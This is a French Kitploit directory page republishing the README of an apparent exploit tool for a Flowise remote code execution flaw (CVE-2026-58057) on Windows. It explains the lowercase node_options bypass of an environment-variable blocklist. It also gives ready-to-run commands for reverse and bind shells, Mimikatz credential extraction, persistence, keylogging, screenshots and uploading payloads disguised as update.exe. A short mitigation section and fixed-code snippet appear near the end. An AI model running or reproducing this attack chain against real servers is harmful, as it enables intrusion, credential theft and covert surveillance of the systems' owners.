Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Flowise-CVE-2026-58057-exploit — Exploit RCE Windows pour Flowise, ciblant CVE-2026-58057. Contourne la validation des variables d'environnement grâce à une faille de sensibilité à la casse. Utilise node_options pour injecter du code arbitraire via MCP stdio. Prend en charge le reverse shell, la persistance, le téléversement de fichiers et l'extraction d'identifiants. Réservé aux tests de sécurité autorisés. | Kitploit
Outils/GitHubGitHub/cerberusmrxi/flowise-cve-2026-58057-exploit
Mécanismes de PersistanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsPost-ExploitationTests d'IntrusionCommandement et ContrôleRed Teaming
Développement de Charges Utiles
GitHubcerberusmrxi/flowise-cve-2026-58057-exploit

Flowise-CVE-2026-58057-exploit

Voir le dépôt
19il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Exploit RCE Windows pour Flowise, ciblant CVE-2026-58057. Contourne la validation des variables d'environnement grâce à une faille de sensibilité à la casse. Utilise node_options pour injecter du code arbitraire via MCP stdio. Prend en charge le reverse shell, la persistance, le téléversement de fichiers et l'extraction d'identifiants. Réservé aux tests de sécurité autorisés.

Partager

Flowise CVE-2026-58057 - Exploit d'exécution de code à distance sur Windows

Project Badge CVE Badge Author Badge Version Badge CVSS Score Badge

Affected Versions Badge
Fixed Version Badge

📋 Vue d'ensemble

Cet outil est un exploit de qualité production pour CVE-2026-58057, une vulnérabilité critique d'exécution de code à distance dans Flowise sur les plateformes Windows. La vulnérabilité provient d'une validation des variables d'environnement sensible à la casse qui ne bloque pas la forme minuscule node_options, permettant aux attaquants de contourner la liste noire NODE_OPTIONS et d'exécuter du code arbitraire via la configuration stdio des MCP personnalisés.

L'exploit illustre des pratiques professionnelles de génie logiciel avec une architecture modulaire, une gestion complète des erreurs et la prise en charge de multiples types de charges utiles.

f1

f2

⚠️ Avertissement

IMPORTANT: Cet outil est fourni uniquement pour des tests de sécurité autorisés, des tests d'intrusion et à des fins éducatives. L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé par ce logiciel. Obtenez toujours une autorisation appropriée avant de tester un système.

🔍 Détails techniques

Cause racine de la vulnérabilité

root@kitploit:~
# Vulnerable Validation (Case-Sensitive )
dangerous = {"PATH", "LD_LIBRARY_PATH", "DYLD_LIBRARY_PATH", "NODE_OPTIONS"}
if key in dangerous:  # Only blocks exact uppercase match
    raise ValueError(f"Modification not allowed")

Mécanisme de l'exploit

  1. L'attaquant s'authentifie sur Flowise

  2. Crée/modifie un nœud stdio MCP personnalisé

  3. Injecte la variable d'environnement node_options en minuscules

  4. Définit la valeur sur --require malicious-loader.js

  5. Node.js exécute le chargeur lorsque le MCP stdio s'exécute

  6. Exécution de code arbitraire obtenue

✨ Fonctionnalités

Capacités principales

  • ✅ Reverse Shell - Connexion de retour vers la machine de l'attaquant

  • ✅ Bind Shell - Ouvre un port d'écoute sur la cible

  • ✅ Exécution de commandes - Exécute des commandes système arbitraires

  • ✅ Upload de fichiers - Transfère des fichiers vers le système cible

  • ✅ Persistance - Plusieurs mécanismes de persistance

  • ✅ Collecte d'informations - Recueille des informations sur le système

  • ✅ Extraction d'identifiants - Intégration Mimikatz

  • ✅ Capture d'écran - Capture les captures d'écran du bureau

  • ✅ Keylogger - Installe une capacité d'enregistrement des frappes clavier

Caractéristiques techniques

  • 🔐 Méthodes d'authentification multiples - Clé API ou nom d'utilisateur/mot de passe

  • 🔄 Logique de nouvelle tentative automatique - Résiliente face aux problèmes réseau

  • 🧹 Auto-nettoyage - Supprime les fichiers chargeurs de la cible

  • 🌐 Multi-plateforme - Fonctionne sur Windows/Linux/macOS

  • 🎨 Sortie colorée - Lisibilité améliorée

  • 📊 Débogage verbeux - Journalisation détaillée pour le dépannage

📦 Installation

Prérequis

  • Python 3.6 ou supérieur

  • pip (gestionnaire de paquets Python)

Installation rapide

root@kitploit:~
# Clone repository
git clone https://github.com/CerberusMrXi/Flowise-CVE-2026-58057-exploit
cd Flowise-CVE-2026-58057-exploit

# Install dependencies
pip install -r requirements.txt

# Or minimal installation
pip install requests urllib3

Installation Docker (optionnelle)

root@kitploit:~
FROM python:3.9-alpine
RUN apk add --no-cache gcc musl-dev
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
COPY exploit.py .
ENTRYPOINT ["python3", "exploit.py"]

🚀 Utilisation

Options de la ligne de commande

root@kitploit:~
python3 exploit.py --help

Options d'authentification

OptionDescriptionExemple
-t, --targetURL de Flowise (obligatoire)http://localhost:3000
-k, --api-keyClé API Flowiseflowise_abc123...
-u, --usernameNom d'utilisateuradmin
-p, --passwordMot de passepassword123

Options de charge utile

OptionDescriptionExemple
--payloadType de charge utilereverse_shell
--lhostHôte de l'écouteur192.168.1.100
--lportPort de l'écouteur4444
--commandCommande à exécuterwhoami
--local-fileFichier à téléverserpayload.exe
--remote-pathChemin d'enregistrement distantC:\\Temp\\update.exe

Options d'exécution

OptionDescription
--interactiveDémarrer un shell interactif
--verboseActiver la sortie de débogage
--timeoutDélai d'expiration des requêtes en secondes
--retriesNombre de tentatives

📝 Exemples d'utilisation

1. Reverse Shell de base

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload reverse_shell \
    --lhost 192.168.1.50 \
    --lport 4444

2. Reverse Shell interactif

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -u admin -p password \
    --payload reverse_shell \
    --lhost 192.168.1.50 \
    --lport 4444 \
    --interactive

3. Exécution de commande

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload command_exec \
    --command "whoami"

4. Upload de fichier

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload file_upload \
    --local-file /path/to/payload.exe \
    --remote-path "C:\\ProgramData\\update.exe"

5. Extraction d'identifiants (Mimikatz)

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload mimikatz

6. Installation de la persistance

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload persistence

7. Collecte d'informations

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -u admin -p password \
    --payload info_gather

8. Capture d'écran

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload screenshot

🎯 Types de charges utiles

Charge utileDescriptionArguments
reverse_shellConnexion de retour vers l'écouteur--lhost, --lport
bind_shellOuvre un port d'écoute--lport
command_execExécute une commande--command
file_uploadTéléverse un fichier vers la cible--local-file, --remote-path
persistenceInstalle la persistanceAucun
info_gatherCollecte les informations systèmeAucun
mimikatzExtrait les identifiantsAucun
screenshotCapture une capture d'écranAucun
keyloggerInstalle un keyloggerAucun

🛡️ Atténuation

Mise à niveau de Flowise

root@kitploit:~
# Upgrade to version 3.1.3 or later
npm install -g flowise@latest
# or
docker pull flowiseai/flowise:latest

Contournements

  • Restreindre l'accès à la configuration des MCP personnalisés

  • Mettre en œuvre la segmentation du réseau

  • Surveiller les variables d'environnement suspectes

  • Utiliser un pare-feu applicatif web (WAF)

Code corrigé

root@kitploit:~
# Fixed Validation (Case-Insensitive)
dangerous = {"PATH", "LD_LIBRARY_PATH", "DYLD_LIBRARY_PATH", "NODE_OPTIONS"}
if key.upper() in dangerous:  # Case-insensitive check
    raise ValueError(f"Modification not allowed")

📊 Exemples de sortie

Exploit réussi

root@kitploit:~
[14:32:15] ℹ Starting exploit sequence...
[14:32:15] ℹ Attempting authentication...
[14:32:16] ✓ Authenticated with API key
[14:32:16] ℹ Preparing reverse_shell payload execution...
[14:32:16] ℹ Injecting environment variable...
[14:32:17] ℹ Triggering payload execution...
[14:32:19] ✓ Payload 'reverse_shell' executed successfully!
[14:32:19] ℹ Reverse shell listener ready on 192.168.1.50:4444

Mode verbeux

root@kitploit:~
[14:32:15] 🔍 Session created with retry strategy
[14:32:15] 🔍 Using existing workspace: ws_123456
[14:32:16] 🔍 Loader written: /tmp/loader_1234_1234567890.js
[14:32:16] 🔍 MCP stdio configuration updated

🐛 Dépannage

Problèmes courants

ProblèmeSolution
Erreur de certificat SSLpip install --trusted-host pypi.org -r requirements.txt
Permission refuséepip install --user -r requirements.txt
Connexion refuséeVérifier l'URL cible et la connectivité réseau
Échec de l'authentificationVérifier la clé API ou le nom d'utilisateur/mot de passe
Échec de la charge utileUtiliser --verbose pour un débogage détaillé
Version PythonS'assurer que Python 3.6+ est installé

Commandes de débogage

root@kitploit:~
# Enable verbose logging
python3 exploit.py -t http://localhost:3000 -k API_KEY --verbose

# Test connectivity
curl -k https://localhost:3000/api/v1/version

# Check Python version
python3 --version

📁 Structure des fichiers

root@kitploit:~
flowise-CVE-2026-58057-exploit/
├── exploit.py          # Main exploit script
├── requirements.txt    # Core dependencies
├── README.md          # This documentation
├── LICENSE            # MIT License
└── CHANGELOG.md       # Version history

🤝 Contribution

  1. Fork du dépôt

  2. Créer une branche de fonctionnalité (git checkout -b feature/amazing)

  3. Valider les modifications (git commit -m 'Add amazing feature')

  4. Pousser vers la branche (git push origin feature/amazing)

  5. Ouvrir une Pull Request

📜 Licence

Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.

🏆 Remerciements

  • FlowiseAI pour le produit

  • Les chercheurs en sécurité qui ont découvert des vulnérabilités similaires

  • La communauté des tests d'intrusion pour les méthodologies de test

🔗 Références

  • CVE-2026-58057

  • Dépôt GitHub de Flowise

  • Documentation de Flowise

  • Sécurité des variables d'environnement Node.js

📧 Contact

Auteur : Sudeepa Wanigarathna Chercheur en sécurité et testeur d'intrusion

⭐ Soutien

Si vous trouvez cet outil utile, pensez à :

  • ⭐ Mettre une étoile sur le dépôt GitHub

  • 🔔 Suivre pour les mises à jour

  • 📝 Signaler les problèmes ou suggestions


Fait avec ❤️ pour la communauté de la sécurité

Télécharger l’outil